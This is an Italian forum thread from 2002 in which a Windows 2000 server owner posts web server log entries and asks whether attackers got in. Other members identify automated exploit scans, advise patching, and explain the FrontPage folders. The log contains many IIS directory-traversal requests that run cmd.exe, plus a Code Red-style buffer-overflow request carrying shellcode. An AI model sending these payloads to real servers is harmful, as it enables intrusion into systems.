Attacco hacker

**ssciort** · 12-03-2002, 11:48

ciao,
penso di essere stato attacato da qualche hacker.
Controllando il mio file di log: access.log mi sono accorto che sono entrati attraverso una falla del Web Server Extensions del Front Page.
Ho messo in fondo a questa e-mail uno stralcio del mio file access.log
Qualcuno di voi sa cosa è successo? Come ha fatto?
Inoltre il tipo ha creato delle cartelle _vti_bin ;_vti_cnf ...
di cui non ho alcun controllo (non riesco ne a rinominarle, ne a cancellarle).
Sapete dirmi cosa devo fare per fare pulizia?
Quale programma di antivirus, firewall, ... mi consigliate di usare per proteggere il mio computer da latri attacchi hacker?
Vi ringrazio anticipatamente
Salvo

P.S.
Il mio sistema operativo è NT2000 Server

P.P.S.
193.251.158.5 non sono io

Access.log:

210.201.31.226 - - [07/Mar/2002:20:34:17 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 500 536
210.201.31.226 - - [07/Mar/2002:20:35:16 +0100] "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 500 536
218.24.130.154 - - [07/Mar/2002:21:08:33 +0100] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252
193.251.158.5 - - [08/Mar/2002:02:27:43 +0100] "GET /scripts/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:43 +0100] "GET /scripts/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:44 +0100] "GET /scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 234
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/.%252e.%252e/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 233
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 234
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 248
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:45 +0100] "GET /cgi-bin/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:46 +0100] "GET /cgi-bin/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 403 235
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%c1%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 231
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 232
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 233
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 235
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 234
193.251.158.5 - - [08/Mar/2002:02:27:47 +0100] "GET /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 247
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /msadc/..%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 400 215
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET / HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:48 +0100] "GET /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:49 +0100] "GET /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:49 +0100] "GET /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524
193.251.158.5 - - [08/Mar/2002:02:27:49 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 500 524

**Michi C** · 12-03-2002, 12:04

E' un expoits, non so se il tuo sistema ne sia immune. In ogni caso accertati di installare tutte le patch che escono, e i service pack se esistenti.
Non è detto che abbiano violato il tuo sistema. Spesso questi sono attacchi lanciati da persone inconsapevoli che si son beccati l'exploits stesso, e vengono usati come ponte.
Ho mega di log di quella roba, peccato che il mio sia un server linux

. Probabilmente son exploit che scandagliano range di IP, forse non era mirato a te, ma al malcapitato di turno col s.o. bacato...

bye

**ssciort** · 12-03-2002, 12:13

forse il malcapitato ora sono io:
come posso fare ad eliminare queste cartelle dal mio pc?

**Michi C** · 12-03-2002, 12:43

Io sinceramente non è che mi intendo tanto di server NT, o 2000 che siano. Comunque, sei sicuro che quelle cartelle non siano necessarie?
Per cancellarle non saprei. Hai provato ad arrestare i servizi che potrebbero utilizzarle? Per esempio IIS.
Lascio la palla ai più esperti...

bye

**ssciort** · 12-03-2002, 12:54

forse il malcapitato ora sono io:
come posso fare ad eliminare queste cartelle dal mio pc?

**xdesign** · 12-03-2002, 21:20

Come ha detto Michi, quello è il risultato di uno scan da parte di un Security Scanner (gli exploit provati sono diversi).

Da quello che si vede nel log, i tentativi non sono andati a buon fine...comunque è sempre meglio tenere aggiornato il sistema con gli update e le patch adeguate.

Le cartelle _vti_bin, _vti_cnf, _vti_log ed altre vengono create al momento dell'installazione delle Estensioni Frontpage.
Se vuoi continuare a usarle, è meglio che non le cancelli

**thyphoon** · 13-03-2002, 10:42

xdesign.... mi hai fregato sul tempo!!!
mi riferisco alla gif "hacker" sotto a "moderatore", ma credo che in quanto tale tu debba scoraggiare queste cose, altrimenti chiunque realizza una gif con scritto moderatore o qualcosa del genere ed il gioco finisce... va a finire che poi si eliminano le gif dalla firma.
Fprse sono stato un po' confuso in questa mia spiegazione, ma credo che tu abbia capito

**xdesign** · 13-03-2002, 18:47

La mia è solo una provocazione, se leggi alcuni recenti thread in OT riguardanti gli avatar lo capisci

Chiunque può usare una gif con scritto "moderatore", ma tanto sopra rimane la qualifica di "membro senior"

**thyphoon** · 13-03-2002, 18:55

hai ragione, ma gli utenti meno esperti potrebbero far confusione non notando la differenza tra del normale testo html ed una gif

**xdesign** · 13-03-2002, 20:56

Hai ragione.

Considera che:

1) Non è sicuramente una mia "invenzione" e non sarò l'unico ad avere notato che l'avatar è così vicino alla qualifica del membro
2) Non penso che l'avatar possa istigare chissà quali "cose", come dici tu
3) Chi usa questo metodo per confondere gli utenti come hai detto, è un imbecille (non penso che il mio confonda gli utenti, ma se vuoi aggiungermi alla cerchia degli imbecilli è a tua discrezione

)

Premesso questo, ho eliminato il mio avatar (penso che fosse quello che volevi)

p.s.
"xdesign.... mi hai fregato sul tempo!!!"
significa che tu potevi usare un avatar simile, e io essendo moderatore non posso?

Discussione: Attacco hacker

Strumenti discussione

Ricerca discussione

Visualizza

Attacco hacker

... come eliminare queste cartelle?

... come eliminare queste cartelle?

Permessi di invio